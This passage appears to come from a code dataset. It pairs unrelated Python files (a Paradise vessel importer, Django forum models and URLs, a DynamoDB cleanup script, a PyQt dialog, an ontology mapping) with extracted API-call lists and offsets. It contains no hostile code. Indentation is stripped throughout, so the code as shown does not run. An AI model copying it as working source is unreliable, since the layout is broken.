"paradise paradoxes":"('\n - '~(atlas|lformat('{full_name_with_id} by {owner.full_name_with_id}')|join('\n - ') ) ) if atlas",
"paradise spells":"('\n - '~(spells|lformat('{full_name_with_id} by {owner.full_name_with_id}')|join('\n - ') ) ) if spells",
"paradise tunnels":"('\n - '~(tunnels|lformat('{full_name_with_id} by {owner.full_name_with_id}')|join('\n - ') ) ) if tunnels",
"paradise count":"universe|length",
"siblings count":"vessel.siblings|length",
"siblings random":"(vessel.siblings|random).name",
"siblings list":"('\n - '~(vessel.siblings|lformat('{full_name_with_id} by {owner.full_name_with_id}')|join('\n - ') ) ) if vessel.siblings",
"time day":"time.day",
"time year":"time.year",
"time month":"time.month",
"time clock":"time.clock",
"time date":"time.date",
"time above":"time.above",
"time below":"time.below",
"vessel id":"vessel.id",
"vessel name":"vessel.name",
"vessel parent id":"vessel.parent.id",
"vessel parent name":"vessel.parent.name",
"vessel stem id":"vessel.stem.id",
"vessel stem name":"vessel.stem.name",
"vessel random id":"vessel.random.id",
"vessel random name":"vessel.random.name",
#"random":"",
}
def parse_memory_array(data):
value_slices=[]
for line in data.splitlines():
if not line.strip():
continue
if line.startswith("~"):
continue
if line.startswith("@ "):
line=line.strip("@ ")
first_word=line.split()[0]
line=line.replace(first_word,first_word+" ")
for match in re.finditer("(\w+)\s*",line):
value_slices.append((match.groups()[0].lower(),list(match.span())))
value_slices[-1][1][1]=None
value_slices=dict(value_slices)
for k,v in value_slices.items():
value_slices[k]=slice(*v)
else:
data={}
for k,v in value_slices.items():
data[k]=line[v].strip()
yield data
def to_jinja(code):
#return code
if code and ("((" in code) and ("))" in code):
chunk=code.split("((")[1].split("))")[0].strip()
if chunk in program_to_jinja:
code=code.replace(chunk," {} ".format(program_to_jinja[chunk]))
code=code.replace("((","<( ").replace("))"," )>")
return code
Vessel.metadata.drop_all(engine)
Vessel.metadata.create_all(engine)
vessel_url="https://raw.githubusercontent.com/XXIIVV/vessel.paradise/master/memory/paradise.ma"
vessels=str(urllib.request.urlopen(vessel_url).read(),"utf-8")
dropped=0
print("Importing Vessels...")
for id_val,record in enumerate(tqdm(list(parse_memory_array(vessels)),ascii=True,disable=False)):
record['id']=id_val
state,parent,owner,created=record['code'].split("-")
record['parent_id']=int(parent.lstrip("0") or "0")
record['owner_id']=int(owner.lstrip("0") or "0")
record['created_raw']=created.lstrip("0") or None
if record['created_raw']:
record['created_raw']=parse(record['created_raw'])
state={attr:val=="1" for attr,val in zip(("locked","hidden","silent","tunnel"),state)}
record.update(state)
del record['code']
record['raw_note']=record['note']
del record['note']
for k,v in record.items():
if isinstance(v,str):
record[k]=to_jinja(v)
if not record['name']:
record['name']="nullspace"
try:
orig_locked=record['locked']
record['locked']=False
Vessel(**record).locked=orig_locked
except InvalidVesselException as e:
dropped+=1
"""
if " ".join([record['attr'],record['name']]).strip():
Vessel(**record)
else:
dropped+=1
"""
Vessel.update()
for v in Vessel.universe:
if v.parent is None:
v.parent_id=0
Vessel.update()
print("Dropped {} Vessels".format(dropped))
dropped=0
print("Importing Forum...")
forum_url="https://raw.githubusercontent.com/XXIIVV/vessel.paradise/master/memory/forum.ma"
forum=str(urllib.request.urlopen(forum_url).read(),"utf-8")
for id_val,record in enumerate(tqdm(list(parse_memory_array(forum)),ascii=True)):
record['from_id']=int(record['from'].lstrip("0") or "0")
del record['from']
record['host_id']=int(record['host'].lstrip("0") or "0")
del record['host']
record['timestamp_raw']=record['timestamp'].lstrip("0") or None
del record['timestamp']
if record['timestamp_raw']:
record['timestamp_raw']=parse(record['timestamp_raw'])
record['id']=id_val
try:
Forum(**record)
except AssertionError:
dropped+=1
Forum.update()
print("Dropped {} Messages".format(dropped)) | [
"dateutil.parser.parse",
"vessel.Vessel.update",
"vessel.Vessel.metadata.drop_all",
"vessel.Forum.update",
"vessel.Vessel.metadata.create_all",
"vessel.Vessel",
"vessel.Forum",
"re.finditer"
] | [((2819, 2851), 'vessel.Vessel.metadata.drop_all', 'Vessel.metadata.drop_all', (['engine'], {}), '(engine)\n', (2843, 2851), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((2852, 2886), 'vessel.Vessel.metadata.create_all', 'Vessel.metadata.create_all', (['engine'], {}), '(engine)\n', (2878, 2886), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((4181, 4196), 'vessel.Vessel.update', 'Vessel.update', ([], {}), '()\n', (4194, 4196), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((4270, 4285), 'vessel.Vessel.update', 'Vessel.update', ([], {}), '()\n', (4283, 4285), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((5065, 5079), 'vessel.Forum.update', 'Forum.update', ([], {}), '()\n', (5077, 5079), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((3487, 3515), 'dateutil.parser.parse', 'parse', (["record['created_raw']"], {}), "(record['created_raw'])\n", (3492, 3515), False, 'from dateutil.parser import parse\n'), ((4931, 4961), 'dateutil.parser.parse', 'parse', (["record['timestamp_raw']"], {}), "(record['timestamp_raw'])\n", (4936, 4961), False, 'from dateutil.parser import parse\n'), ((5003, 5018), 'vessel.Forum', 'Forum', ([], {}), '(**record)\n', (5008, 5018), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((2055, 2086), 're.finditer', 're.finditer', (['"""(\\\\w+)\\\\s*"""', 'line'], {}), "('(\\\\w+)\\\\s*', line)\n", (2066, 2086), False, 'import re\n'), ((3958, 3974), 'vessel.Vessel', 'Vessel', ([], {}), '(**record)\n', (3964, 3974), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n')] |
from __future__ import print_function # Python 2/3 compatibility
import boto3
dynamodb = boto3.resource('dynamodb', endpoint_url="http://localhost:8000")
table = dynamodb.Table('Election')
table.delete()
table = dynamodb.Table('Vote')
table.delete() | [
"boto3.resource"
] | [((90, 154), 'boto3.resource', 'boto3.resource', (['"""dynamodb"""'], {'endpoint_url': '"""http://localhost:8000"""'}), "('dynamodb', endpoint_url='http://localhost:8000')\n", (104, 154), False, 'import boto3\n')] |
import setuptools
# read the contents of your README file
from pathlib import Path
this_directory = Path(__file__).parent
long_description = (this_directory / "README.md").read_text()
setuptools.setup(
name='pybgpkit',
version='0.1.0',
description='BGPKIT tools Python bindings',
url='https://github.com/bgpkit/pybgpkit',
author='<NAME>',
author_email='<EMAIL>',
packages=setuptools.find_packages(),
include_package_data=True,
long_description=long_description,
long_description_content_type='text/markdown',
install_requires=[
# available on pip
'dataclasses_json',
'pybgpkit-parser==0.1.0',
'requests',
],
entry_points={
'console_scripts': [
"pybgpkit=bgpkit.cli:main"
]
}
)
| [
"setuptools.find_packages",
"pathlib.Path"
] | [((101, 115), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (105, 115), False, 'from pathlib import Path\n'), ((402, 428), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (426, 428), False, 'import setuptools\n')] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/chain_creation.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(215, 116)
self.textEdit_2 = QtWidgets.QTextEdit(Dialog)
self.textEdit_2.setGeometry(QtCore.QRect(120, 20, 71, 31))
self.textEdit_2.setObjectName("textEdit_2")
self.comboBox = QtWidgets.QComboBox(Dialog)
self.comboBox.setGeometry(QtCore.QRect(30, 20, 78, 27))
self.comboBox.setObjectName("comboBox")
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setGeometry(QtCore.QRect(30, 70, 176, 27))
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
| [
"PyQt5.QtWidgets.QTextEdit",
"PyQt5.QtWidgets.QDialogButtonBox",
"PyQt5.QtWidgets.QComboBox",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtCore.QRect"
] | [((400, 427), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['Dialog'], {}), '(Dialog)\n', (419, 427), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((571, 598), 'PyQt5.QtWidgets.QComboBox', 'QtWidgets.QComboBox', (['Dialog'], {}), '(Dialog)\n', (590, 598), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((736, 770), 'PyQt5.QtWidgets.QDialogButtonBox', 'QtWidgets.QDialogButtonBox', (['Dialog'], {}), '(Dialog)\n', (762, 770), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1038, 1083), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['Dialog'], {}), '(Dialog)\n', (1075, 1083), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((464, 493), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(120)', '(20)', '(71)', '(31)'], {}), '(120, 20, 71, 31)\n', (476, 493), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((633, 661), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(30)', '(20)', '(78)', '(27)'], {}), '(30, 20, 78, 27)\n', (645, 661), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((806, 835), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(30)', '(70)', '(176)', '(27)'], {}), '(30, 70, 176, 27)\n', (818, 835), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')] |
from sklearn.base import BaseEstimator
from sklearn.multiclass import OneVsRestClassifier
from sklearn.linear_model import LogisticRegression as SKLearnLR
class LogisticRegression(BaseEstimator):
def __init__(self):
pass
def fit(self, X, y):
# TODO: Consider pure (no penalty) LR
# TODO: Look into convergence issues with other (faster) solvers
# (Also running into some version-related issues.)
self._clf = OneVsRestClassifier(SKLearnLR(solver='liblinear'))
self._clf.fit(X, y)
return self
def predict(self, X):
return self._clf.predict(X) | [
"sklearn.linear_model.LogisticRegression"
] | [((484, 513), 'sklearn.linear_model.LogisticRegression', 'SKLearnLR', ([], {'solver': '"""liblinear"""'}), "(solver='liblinear')\n", (493, 513), True, 'from sklearn.linear_model import LogisticRegression as SKLearnLR\n')] |
import numpy as np
MAX = 10000
matrix = np.full((MAX, MAX), False)
def pretty_print(matrix):
print_matrix = np.full(matrix.shape, ".")
print_matrix[matrix] = "#"
for row in print_matrix:
for symb in row:
print(symb, end="")
print()
def fold_once(matrix, axis, value):
if axis == "y": # top fold
matrix = matrix.T
assert matrix[:, value].sum() == 0
iter = matrix.shape[1] - value
for i in range(iter):
matrix[:, value-i] = np.logical_or(matrix[:, value-i], matrix[:, value+i])
matrix = matrix[:, :value]
return matrix if axis == "x" else matrix.T
max_x, max_y = float("-inf"), float("-inf")
while inp := input(): # walrus
y, x = [int(num) for num in inp.split(",")]
matrix[x, y] = True
max_x = max(x, max_x)
max_y = max(y, max_y)
if max_x % 2 != 0:
max_x += 1
if max_y % 2 != 0:
max_y += 1
first = False
matrix = matrix[:max_x+1, :max_y+1]
while inp := input():
axis, value = inp.split(" ")[-1].split("=")
value = int(value)
matrix = fold_once(matrix, axis, value)
if not first:
print("Part 1:", matrix.sum())
first = True
print()
print("PART 2")
print("======")
pretty_print(matrix)
| [
"numpy.full",
"numpy.logical_or"
] | [((41, 67), 'numpy.full', 'np.full', (['(MAX, MAX)', '(False)'], {}), '((MAX, MAX), False)\n', (48, 67), True, 'import numpy as np\n'), ((115, 141), 'numpy.full', 'np.full', (['matrix.shape', '"""."""'], {}), "(matrix.shape, '.')\n", (122, 141), True, 'import numpy as np\n'), ((502, 559), 'numpy.logical_or', 'np.logical_or', (['matrix[:, value - i]', 'matrix[:, value + i]'], {}), '(matrix[:, value - i], matrix[:, value + i])\n', (515, 559), True, 'import numpy as np\n')] |
from ckeditor.fields import RichTextField
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils import timezone
from django.utils.html import strip_tags
from django.utils.text import Truncator
from django.utils.translation import gettext_lazy as _
from html_sanitizer.django import get_sanitizer
class BaseQuerySet(models.QuerySet):
def visible(self):
return self.exclude(moderation_status=self.model.HIDDEN)
class BaseModel(models.Model):
GOOD = "good"
FLAGGED = "flagged"
HIDDEN = "hidden"
MODERATION_STATUS_CHOICES = (
(GOOD, _("good")),
(FLAGGED, _("flagged")),
(HIDDEN, _("hidden")),
)
MODERATION_ACTION_CHOICES = (
(GOOD, _("approve content")),
(HIDDEN, _("hide content")),
)
created_at = models.DateTimeField(_("created at"), default=timezone.now)
authored_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
verbose_name=_("authored by"),
)
moderation_status = models.CharField(
_("moderation status"),
max_length=10,
choices=MODERATION_STATUS_CHOICES,
default=GOOD,
)
objects = BaseQuerySet.as_manager()
class Meta:
abstract = True
class ThreadQuerySet(BaseQuerySet):
def active(self):
return self.visible().filter(closed_at__isnull=True)
def closed(self):
return self.visible().filter(closed_at__isnull=False)
class Thread(BaseModel):
title = models.CharField(_("title"), max_length=200)
is_pinned = models.BooleanField(
_("is pinned"),
default=False,
help_text=_("Pinned threads are shown at the top of the thread list."),
)
closed_at = models.DateTimeField(_("closed at"), blank=True, null=True)
latest_post = models.OneToOneField(
"Post",
on_delete=models.SET_NULL,
related_name="+",
blank=True,
null=True,
verbose_name=_("latest post"),
)
post_count = models.IntegerField(_("post count"), default=0)
starred_by = models.ManyToManyField(
settings.AUTH_USER_MODEL,
blank=True,
related_name="starred_threads",
verbose_name=_("starred by"),
)
objects = ThreadQuerySet.as_manager()
class Meta:
ordering = ["-is_pinned", "-latest_post__created_at", "-created_at"]
verbose_name = _("thread")
verbose_name_plural = _("threads")
def __str__(self):
return self.title
def get_absolute_url(self):
if self.moderation_status == self.HIDDEN:
return reverse("tinyforum:thread-list")
return reverse("tinyforum:thread-detail", kwargs={"pk": self.pk})
def save(self, *args, **kwargs):
if self.pk:
self.post_count = self.posts.visible().count()
self.latest_post = self.posts.visible().last()
super().save(*args, **kwargs)
save.alters_data = True
class Post(BaseModel):
thread = models.ForeignKey(
Thread, on_delete=models.CASCADE, verbose_name=_("thread"), related_name="posts"
)
text = RichTextField(_("text"), config_name="tinyforum-post")
class Meta:
ordering = ["created_at"]
verbose_name = _("post")
verbose_name_plural = _("post")
def __str__(self):
return Truncator(strip_tags(self.text)).words(20, truncate="...")
def save(self, *args, **kwargs):
self.text = get_sanitizer("tinyforum-post").sanitize(self.text)
super().save(*args, **kwargs)
self.thread.save()
save.alters_data = True
class Report(BaseModel):
REASON_CHOICES = (
("annoying", _("It's annoying or not interesting")),
("misplaced", _("I think it shouldn't be here")),
("spam", _("It's spam")),
)
reason = models.CharField(_("reason"), max_length=10, choices=REASON_CHOICES)
notes = models.TextField(
_("notes"), blank=True, help_text=_("Anything else you want to say?")
)
handled_at = models.DateTimeField(_("handled at"), blank=True, null=True)
handled_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.PROTECT,
blank=True,
null=True,
verbose_name=_("handled by"),
related_name="+",
)
# Override BaseModel.moderation_status with a blank=True version
moderation_status = models.CharField(
_("moderation status"),
max_length=10,
choices=BaseModel.MODERATION_STATUS_CHOICES,
default=BaseModel.FLAGGED,
)
class Meta:
abstract = True
class PostReport(Report):
post = models.ForeignKey(
Post, on_delete=models.CASCADE, related_name="reports", verbose_name=_("post")
)
class Meta:
unique_together = (("authored_by", "post"),)
verbose_name = _("post report")
verbose_name_plural = _("post reports")
| [
"django.utils.translation.gettext_lazy",
"django.utils.html.strip_tags",
"html_sanitizer.django.get_sanitizer",
"django.urls.reverse"
] | [((864, 879), 'django.utils.translation.gettext_lazy', '_', (['"""created at"""'], {}), "('created at')\n", (865, 879), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1103, 1125), 'django.utils.translation.gettext_lazy', '_', (['"""moderation status"""'], {}), "('moderation status')\n", (1104, 1125), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1565, 1575), 'django.utils.translation.gettext_lazy', '_', (['"""title"""'], {}), "('title')\n", (1566, 1575), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1638, 1652), 'django.utils.translation.gettext_lazy', '_', (['"""is pinned"""'], {}), "('is pinned')\n", (1639, 1652), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1800, 1814), 'django.utils.translation.gettext_lazy', '_', (['"""closed at"""'], {}), "('closed at')\n", (1801, 1814), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2078, 2093), 'django.utils.translation.gettext_lazy', '_', (['"""post count"""'], {}), "('post count')\n", (2079, 2093), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2445, 2456), 'django.utils.translation.gettext_lazy', '_', (['"""thread"""'], {}), "('thread')\n", (2446, 2456), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2487, 2499), 'django.utils.translation.gettext_lazy', '_', (['"""threads"""'], {}), "('threads')\n", (2488, 2499), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2700, 2758), 'django.urls.reverse', 'reverse', (['"""tinyforum:thread-detail"""'], {'kwargs': "{'pk': self.pk}"}), "('tinyforum:thread-detail', kwargs={'pk': self.pk})\n", (2707, 2758), False, 'from django.urls import reverse\n'), ((3179, 3188), 'django.utils.translation.gettext_lazy', '_', (['"""text"""'], {}), "('text')\n", (3180, 3188), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3294, 3303), 'django.utils.translation.gettext_lazy', '_', (['"""post"""'], {}), "('post')\n", (3295, 3303), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3334, 3343), 'django.utils.translation.gettext_lazy', '_', (['"""post"""'], {}), "('post')\n", (3335, 3343), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3886, 3897), 'django.utils.translation.gettext_lazy', '_', (['"""reason"""'], {}), "('reason')\n", (3887, 3897), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3976, 3986), 'django.utils.translation.gettext_lazy', '_', (['"""notes"""'], {}), "('notes')\n", (3977, 3986), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4091, 4106), 'django.utils.translation.gettext_lazy', '_', (['"""handled at"""'], {}), "('handled at')\n", (4092, 4106), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4464, 4486), 'django.utils.translation.gettext_lazy', '_', (['"""moderation status"""'], {}), "('moderation status')\n", (4465, 4486), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4890, 4906), 'django.utils.translation.gettext_lazy', '_', (['"""post report"""'], {}), "('post report')\n", (4891, 4906), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4937, 4954), 'django.utils.translation.gettext_lazy', '_', (['"""post reports"""'], {}), "('post reports')\n", (4938, 4954), True, 'from django.utils.translation import gettext_lazy as _\n'), ((628, 637), 'django.utils.translation.gettext_lazy', '_', (['"""good"""'], {}), "('good')\n", (629, 637), True, 'from django.utils.translation import gettext_lazy as _\n'), ((658, 670), 'django.utils.translation.gettext_lazy', '_', (['"""flagged"""'], {}), "('flagged')\n", (659, 670), True, 'from django.utils.translation import gettext_lazy as _\n'), ((690, 701), 'django.utils.translation.gettext_lazy', '_', (['"""hidden"""'], {}), "('hidden')\n", (691, 701), True, 'from django.utils.translation import gettext_lazy as _\n'), ((759, 779), 'django.utils.translation.gettext_lazy', '_', (['"""approve content"""'], {}), "('approve content')\n", (760, 779), True, 'from django.utils.translation import gettext_lazy as _\n'), ((799, 816), 'django.utils.translation.gettext_lazy', '_', (['"""hide content"""'], {}), "('hide content')\n", (800, 816), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1029, 1045), 'django.utils.translation.gettext_lazy', '_', (['"""authored by"""'], {}), "('authored by')\n", (1030, 1045), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1695, 1755), 'django.utils.translation.gettext_lazy', '_', (['"""Pinned threads are shown at the top of the thread list."""'], {}), "('Pinned threads are shown at the top of the thread list.')\n", (1696, 1755), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2017, 2033), 'django.utils.translation.gettext_lazy', '_', (['"""latest post"""'], {}), "('latest post')\n", (2018, 2033), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2262, 2277), 'django.utils.translation.gettext_lazy', '_', (['"""starred by"""'], {}), "('starred by')\n", (2263, 2277), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2652, 2684), 'django.urls.reverse', 'reverse', (['"""tinyforum:thread-list"""'], {}), "('tinyforum:thread-list')\n", (2659, 2684), False, 'from django.urls import reverse\n'), ((3114, 3125), 'django.utils.translation.gettext_lazy', '_', (['"""thread"""'], {}), "('thread')\n", (3115, 3125), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3717, 3754), 'django.utils.translation.gettext_lazy', '_', (['"""It\'s annoying or not interesting"""'], {}), '("It\'s annoying or not interesting")\n', (3718, 3754), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3779, 3812), 'django.utils.translation.gettext_lazy', '_', (['"""I think it shouldn\'t be here"""'], {}), '("I think it shouldn\'t be here")\n', (3780, 3812), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3832, 3846), 'django.utils.translation.gettext_lazy', '_', (['"""It\'s spam"""'], {}), '("It\'s spam")\n', (3833, 3846), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4010, 4045), 'django.utils.translation.gettext_lazy', '_', (['"""Anything else you want to say?"""'], {}), "('Anything else you want to say?')\n", (4011, 4045), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4295, 4310), 'django.utils.translation.gettext_lazy', '_', (['"""handled by"""'], {}), "('handled by')\n", (4296, 4310), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4781, 4790), 'django.utils.translation.gettext_lazy', '_', (['"""post"""'], {}), "('post')\n", (4782, 4790), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3500, 3531), 'html_sanitizer.django.get_sanitizer', 'get_sanitizer', (['"""tinyforum-post"""'], {}), "('tinyforum-post')\n", (3513, 3531), False, 'from html_sanitizer.django import get_sanitizer\n'), ((3393, 3414), 'django.utils.html.strip_tags', 'strip_tags', (['self.text'], {}), '(self.text)\n', (3403, 3414), False, 'from django.utils.html import strip_tags\n')] |
from django.urls import path
from account import views as account_views
urlpatterns = [
path('begin/', account_views.BeginView.as_view(), name='begin'),
path('signup/', account_views.SignUpView.as_view(), name='signup'),
path('login/', account_views.LoginView.as_view(), name='login'),
path('logout/', account_views.LogoutView.as_view(), name='logout'),
path('password-reset/', account_views.ResetPasswordView.as_view(), name='password-reset'),
path('password-reset-sent/', account_views.password_reset_sent, name='password-reset-sent'),
path('account-activation-send/', account_views.account_activation_sent, name='account-activation-sent'),
path('activate/<uidb64>/<token>/', account_views.activate, name='activate'),
]
| [
"account.views.BeginView.as_view",
"account.views.LogoutView.as_view",
"account.views.LoginView.as_view",
"account.views.SignUpView.as_view",
"django.urls.path",
"account.views.ResetPasswordView.as_view"
] | [((471, 567), 'django.urls.path', 'path', (['"""password-reset-sent/"""', 'account_views.password_reset_sent'], {'name': '"""password-reset-sent"""'}), "('password-reset-sent/', account_views.password_reset_sent, name=\n 'password-reset-sent')\n", (475, 567), False, 'from django.urls import path\n'), ((569, 676), 'django.urls.path', 'path', (['"""account-activation-send/"""', 'account_views.account_activation_sent'], {'name': '"""account-activation-sent"""'}), "('account-activation-send/', account_views.account_activation_sent,\n name='account-activation-sent')\n", (573, 676), False, 'from django.urls import path\n'), ((678, 753), 'django.urls.path', 'path', (['"""activate/<uidb64>/<token>/"""', 'account_views.activate'], {'name': '"""activate"""'}), "('activate/<uidb64>/<token>/', account_views.activate, name='activate')\n", (682, 753), False, 'from django.urls import path\n'), ((108, 141), 'account.views.BeginView.as_view', 'account_views.BeginView.as_view', ([], {}), '()\n', (139, 141), True, 'from account import views as account_views\n'), ((179, 213), 'account.views.SignUpView.as_view', 'account_views.SignUpView.as_view', ([], {}), '()\n', (211, 213), True, 'from account import views as account_views\n'), ((250, 283), 'account.views.LoginView.as_view', 'account_views.LoginView.as_view', ([], {}), '()\n', (281, 283), True, 'from account import views as account_views\n'), ((320, 354), 'account.views.LogoutView.as_view', 'account_views.LogoutView.as_view', ([], {}), '()\n', (352, 354), True, 'from account import views as account_views\n'), ((400, 441), 'account.views.ResetPasswordView.as_view', 'account_views.ResetPasswordView.as_view', ([], {}), '()\n', (439, 441), True, 'from account import views as account_views\n')] |
"""MEG system lockfile parser
Can be used to parse the lock file and preform operations on the lockfile
Only interacts with the lockfile, does not preform any git actions
Does not check permissions before actions are taken
All file paths are relitive to the repository directory
Working directory should be changed by the git module
"""
import json
import os.path
import time
class LockFile:
"""Parse a lockfile and preform locking operations
"""
def __init__(self, filepath):
"""Open a lockfile and initalize class with it
Args:
filepath (string): path to the lockfile
"""
self.update(filepath)
def addLock(self, filepath, username):
"""Adds the lock to the lockfile
Args:
filepath (string): path to the file to lock
username (string): name of locking user
"""
self._lockData["locks"].append({
"file": filepath,
"user": username,
"date": time.time()
})
json.dump(self._lockData, open(self._filepath, 'w'))
def removeLock(self, filepath):
"""Remove any lock for the given file
Args:
filepath (string): path to the file to unlock
"""
for entry in self._lockData["locks"]:
if(entry["file"] == filepath):
self._lockData["locks"].remove(entry)
json.dump(self._lockData, open(self._filepath, 'w'))
def findLock(self, filepath):
"""Find if there is a lock on the file
Args:
filepath (string): path of file to look for
Returns:
(dictionary): lockfile entry for the file
(None): There is no entry
"""
for entry in self._lockData["locks"]:
if(entry["file"] == filepath):
return entry
return None
@property
def locks(self):
"""Returns the list of locks
"""
return self._lockData["locks"]
def update(self, filepath=None):
"""Updates this object with the current data in the lockfile
If the file doesn't exist, create one
Args:
filepath (string): path to the lockfile
"""
if(filepath is None):
filepath = self._filepath
else:
self._filepath = filepath
if(not os.path.exists(filepath)):
self._locks = {
"comment": "MEG System locking file, avoid manually editing",
"locks": []
}
newFile = open(filepath, 'w')
newFile.write(json.dumps(self._locks))
newFile.close()
try:
self._lockData = json.load(open(filepath))
except json.decoder.JSONDecodeError:
#Lock file couldn't be found, or is corrupted
#TODO: do something here
pass
| [
"json.dumps",
"time.time"
] | [((997, 1008), 'time.time', 'time.time', ([], {}), '()\n', (1006, 1008), False, 'import time\n'), ((2626, 2649), 'json.dumps', 'json.dumps', (['self._locks'], {}), '(self._locks)\n', (2636, 2649), False, 'import json\n')] |
# Generated by Django 3.1.3 on 2020-12-08 11:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('artist', '0006_auto_20201208_1052'),
]
operations = [
migrations.AlterModelOptions(
name='comment',
options={},
),
migrations.RemoveField(
model_name='comment',
name='name',
),
migrations.AddField(
model_name='comment',
name='slug',
field=models.SlugField(default=1),
preserve_default=False,
),
migrations.AlterField(
model_name='comment',
name='content',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='artist.content'),
),
]
| [
"django.db.migrations.AlterModelOptions",
"django.db.models.ForeignKey",
"django.db.migrations.RemoveField",
"django.db.models.SlugField"
] | [((267, 323), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""comment"""', 'options': '{}'}), "(name='comment', options={})\n", (295, 323), False, 'from django.db import migrations, models\n'), ((368, 425), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""comment"""', 'name': '"""name"""'}), "(model_name='comment', name='name')\n", (390, 425), False, 'from django.db import migrations, models\n'), ((568, 595), 'django.db.models.SlugField', 'models.SlugField', ([], {'default': '(1)'}), '(default=1)\n', (584, 595), False, 'from django.db import migrations, models\n'), ((755, 843), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""artist.content"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'artist.content')\n", (772, 843), False, 'from django.db import migrations, models\n')] |
from pathlib import Path
from ontopy import get_ontology, World
# Setup dlite paths
thisdir = Path(__file__).parent.absolute()
rootdir = thisdir.parent.parent
# Note install emmopython from github, not pypi.
world = World()
mapsTo_onto = world.get_ontology(f'{rootdir}/ontology/mapsTo.ttl').load(
EMMObased=False)
chemistry_onto = world.get_ontology(f'{rootdir}/ontology/chemistry.ttl').load()
dlite_onto = world.get_ontology(
'https://raw.githubusercontent.com/emmo-repo/datamodel-ontology/master'
'/dlitemodel.ttl').load(EMMObased=False)
mapping = world.get_ontology('http://onto-ns.com/ontology/mapping#')
mapping.set_version('0.1')
mapping.imported_ontologies.extend([mapsTo_onto, chemistry_onto, dlite_onto])
substance_model = dlite_onto.Metadata()
substance_model.iri = 'http://onto-ns.com/meta/0.1/Substance'
substance_energy = dlite_onto.Metadata()
substance_energy.iri = 'http://onto-ns.com/meta/0.1/Substance#molecule_energy'
substance_id = dlite_onto.Metadata()
substance_id.iri = 'http://onto-ns.com/meta/0.1/Substance#id'
with mapping:
substance_model.mapsTo.append(chemistry_onto.MoleculeModel)
substance_energy.mapsTo.append(chemistry_onto.GroundStateEnergy)
substance_id.mapsTo.append(chemistry_onto.Identifier)
mapping.save(f'{thisdir}/mapping_substance.ttl')
# A catalog file is not writte here because the catalog from molecule
# can be reused. This will most likely not be the case in a more realistic
# example where the different mappings will reside in different places
# (folders)
| [
"ontopy.World",
"pathlib.Path"
